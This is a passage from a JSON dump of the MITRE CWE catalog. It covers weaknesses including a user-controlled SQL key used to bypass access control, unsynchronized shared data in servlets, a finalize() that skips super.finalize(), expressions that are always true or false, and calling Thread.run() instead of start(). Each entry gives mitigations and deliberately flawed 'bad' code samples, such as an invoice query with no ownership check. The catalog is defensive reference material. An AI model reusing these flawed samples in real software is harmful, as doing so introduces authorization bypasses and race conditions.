Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Application Data","Modify Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Assume all input is malicious. Use a standard input validation mechanism to validate all input for length, type, syntax, and business rules before accepting the data. Use an \\"accept known good\\" validation strategy."},{"Phase":"Implementation","Description":"Use a parameterized query AND make sure that the accepted values conform to the business rules. Construct your SQL statement accordingly."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...conn = new SqlConnection(_ConnectionString);conn.Open();int16 id = System.Convert.ToInt16(invoiceID.Text);SqlCommand query = new SqlCommand( \\"SELECT * FROM invoices WHERE id = @id\\", conn);query.Parameters.AddWithValue(\\"@id\\", id);SqlDataReader objReader = objCommand.ExecuteReader();...","xhtml:br":["","","","","","",""]}},"Body_Text":"The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Access Control Bypass Through User-Controlled SQL Primary Key","attr":{"@_Date":"2011-03-29"}}}},"567":{"attr":{"@_ID":"567","@_Name":"Unsynchronized Access to Shared Data in a Multithreaded Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes.","Extended_Description":{"xhtml:p":["Within servlets, shared static variables are not protected from concurrent access, but servlets are multithreaded. This is a typical programming mistake in J2EE applications, since the multithreading is handled by the framework. When a shared variable can be influenced by an attacker, one thread could wind up modifying the variable to contain data that is not valid for a different thread that is also using the data within the variable.","Note that this weakness is not unique to servlets."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"488","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"],"Note":"If the shared variable contains sensitive data, it may be manipulated or displayed in another user session. If this data is used to control the application, its value can be manipulated to cause the application to crash or perform poorly."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove the use of static variables used between servlets. If this cannot be avoided, use synchronized access for these variables."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code implements a basic counter for how many times the page has been accesed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public static class Counter extends HttpServlet {}","xhtml:div":{"#text":"static int count = 0;protected void doGet(HttpServletRequest in, HttpServletResponse out)throws ServletException, IOException {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"out.setContentType(\\"text/plain\\");PrintWriter p = out.getWriter();count++;p.println(count + \\" hits so far!\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}}},"Body_Text":["Consider when two separate threads, Thread A and Thread B, concurrently handle two different requests:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Assume this is the first occurrence of doGet, so the value of count is 0."},{"xhtml:div":"doGet() is called within Thread A."},{"xhtml:div":"The execution of doGet() in Thread A continues to the point AFTER the value of the count variable is read, then incremented, but BEFORE it is saved back to count. At this stage, the incremented value is 1, but the value of count is 0."},{"xhtml:div":"doGet() is called within Thread B, and due to a higher thread priority, Thread B progresses to the point where the count variable is accessed (where it is still 0), incremented, and saved. After the save, count is 1."},{"xhtml:div":"Thread A continues. It saves the intermediate, incremented value to the count variable - but the incremented value is 1, so count is \\"re-saved\\" to 1."}]}},"At this point, both Thread A and Thread B print that one hit has been seen, even though two separate requests have been processed. The value of count should be 2, not 1.","While this example does not have any real serious implications, if the shared variable in question is used for resource tracking, then resource consumption could occur. Other scenarios exist."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-09","Modification_Importance":"Critical","Modification_Comment":"Made name and description more specific to match the essence of the rest of the entry."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Unsynchronized Access to Shared Data","attr":{"@_Date":"2010-12-13"}}}},"568":{"attr":{"@_ID":"568","@_Name":"finalize() Method Without super.finalize()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a finalize() method that does not call super.finalize().","Extended_Description":"The Java Language Specification states that it is a good practice for a finalize() method to call super.finalize().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Call the super.finalize() method."},{"Phase":"Testing","Description":"Use static analysis tools to spot such issues in your code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following method omits the call to super.finalize().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void finalize() {}","xhtml:div":{"#text":"discardNative();","attr":{"@_style":"margin-left:10px;"}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous Finalize Method","attr":{"@_Date":"2008-04-11"}}}},"570":{"attr":{"@_ID":"570","@_Name":"Expression is Always False","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an expression that will always evaluate to false.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"561","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static Analysis tools to spot such conditions."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the updateUserAccountOrder() method used within an e-business product ordering/inventory application will validate the product number that was ordered and the user account number. If they are valid, the method will update the product inventory, the user account, and the user order appropriately.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void updateUserAccountOrder(String productNumber, String accountNumber) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isValidProduct = false;boolean isValidAccount = false;if (validProductNumber(productNumber)) {}else {}if (validAccountNumber(accountNumber)) {}if (isValidProduct &amp;&amp; isValidAccount) {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"isValidProduct = true;updateInventory(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return;","attr":{"@_style":"margin-left:10px;"}},{"#text":"isValidProduct = true;updateAccount(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"updateAccountOrder(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"...if (validAccountNumber(accountNumber)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"isValidAccount = true;updateAccount(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["However, the method never sets the isValidAccount variable after initializing it to false so the isValidProduct is mistakenly used twice. The result is that the expression \\"isValidProduct &amp;&amp; isValidAccount\\" will always evaluate to false, so the updateAccountOrder() method will never be invoked. This will create serious problems with the product ordering application since the user account and inventory databases will be updated but the order will not be updated.","This can be easily corrected by updating the appropriate variable."]},{"Intro_Text":"In the following example, the hasReadWriteAccess method uses bit masks and bit operators to determine if a user has read and write privileges for a particular process. The variable mask is defined as a bit mask from the BIT_READ and BIT_WRITE constants that have been defined. The variable mask is used within the predicate of the hasReadWriteAccess method to determine if the userMask input parameter has the read and write bits set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BIT_READ 0x0001 // 00000001#define BIT_WRITE 0x0010 // 00010000unsigned int mask = BIT_READ &amp; BIT_WRITE; /* intended to use \\"|\\" */// using \\"&amp;\\", mask = 00000000// using \\"|\\", mask = 00010001// determine if user has read and write accessint hasReadWriteAccess(unsigned int userMask) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// if the userMask has read and write bits set// then return 1 (true)if (userMask &amp; mask) {}// otherwise return 0 (false)return 0;","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return 1;","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":["However the bit operator used to initialize the mask variable is the AND operator rather than the intended OR operator (CWE-480), this resulted in the variable mask being set to 0. As a result, the if statement will always evaluate to false and never get executed.","The use of bit masks, bit operators and bitwise operations on variables can be difficult. If possible, try to use frameworks or libraries that provide appropriate functionality and abstract the implementation."]},{"Intro_Text":"In the following example, the updateInventory method used within an e-business inventory application will update the inventory for a particular product. This method includes an if statement with an expression that will always evaluate to false. This is a common practice in C/C++ to introduce debugging statements quickly by simply changing the expression to evaluate to true and then removing those debugging statements by changing expression to evaluate to false. This is also a common practice for disabling features no longer needed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int updateInventory(char* productNumber, int numberOfItems) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int initCount = getProductCount(productNumber);int updatedCount = initCount + numberOfItems;int updated = updateProductCount(updatedCount);// if statement for debugging purposes onlyif (1 == 0) {}return updated;","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char productName[128];productName = getProductName(productNumber);printf(\\"product %s initially has %d items in inventory \\\\n\\", productName, initCount);printf(\\"adding %d items to inventory for %s \\\\n\\", numberOfItems, productName);if (updated == 0) {}else {}","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Inventory updated for product %s to %d items \\\\n\\", productName, updatedCount);","attr":{"@_style":"margin-left:10px;"}},{"#text":"printf(\\"Inventory not updated for product: %s \\\\n\\", productName);","attr":{"@_style":"margin-left:10px;"}}]}}}}}},"Body_Text":"Using this practice for introducing debugging statements or disabling features creates dead code that can cause problems during code maintenance and potentially introduce vulnerabilities. To avoid using expressions that evaluate to false for debugging purposes a logging API or debugging API should be used for the output of debugging messages."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"571":{"attr":{"@_ID":"571","@_Name":"Expression is Always True","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an expression that will always evaluate to true.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"561","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static Analysis tools to spot such conditions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the updateInventory() method used within an e-business product ordering/inventory application will check if the input product number is in the store or in the warehouse. If the product is found, the method will update the store or warehouse database as well as the aggregate product database. If the product is not found, the method intends to do some special processing without updating any database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void updateInventory(String productNumber) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isProductAvailable = false;boolean isDelayed = false;if (productInStore(productNumber)) {}else if (productInWarehouse(productNumber)) {}else {}if ( isProductAvailable ) {}else if ( isDelayed ) {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"isProductAvailable = true;updateInStoreDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isProductAvailable = true;updateInWarehouseDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isProductAvailable = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"updateProductDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"/* Warn customer about delay before order processing */"}}]}}}},"Body_Text":"However, the method never sets the isDelayed variable and instead will always update the isProductAvailable variable to true. The result is that the predicate testing the isProductAvailable boolean will always evaluate to true and therefore always update the product database. Further, since the isDelayed variable is initialized to false and never changed, the expression always evaluates to false and the customer will never be warned of a delay on their product."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"572":{"attr":{"@_ID":"572","@_Name":"Call to Thread run() instead of start()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program calls a thread\'s run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee.","Extended_Description":"In most cases a direct call to a Thread object\'s run() method is a bug. The programmer intended to begin a new thread of control, but accidentally called run() instead of start(), so the run() method will execute in the caller\'s thread of control.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use the start() method instead of the run() method."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following excerpt from a Java program mistakenly calls run() instead of start().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Thread thr = new Thread() {};thr.run();","xhtml:div":{"#text":"public void run() {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":["",""]}}}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"THI00-J","Entry_Name":"Do not invoke Thread.run()"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Call to Thread.run()","attr":{"@_Date":"2008-04-11"}}}},"573":{"attr":{"@_ID":"573","@_Name":"Improper Following of Specification by Caller","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not follow or incorrectly follows the specifications as required by the implementation language, environment, framework, protocol, or platform.","Extended_Description":"When leveraging external functionality, such as an API, it is important that the caller does so in accordance with the requirements of the external functionality or else unintended behaviors may result, possibly leaving the system vulnerable to any number of 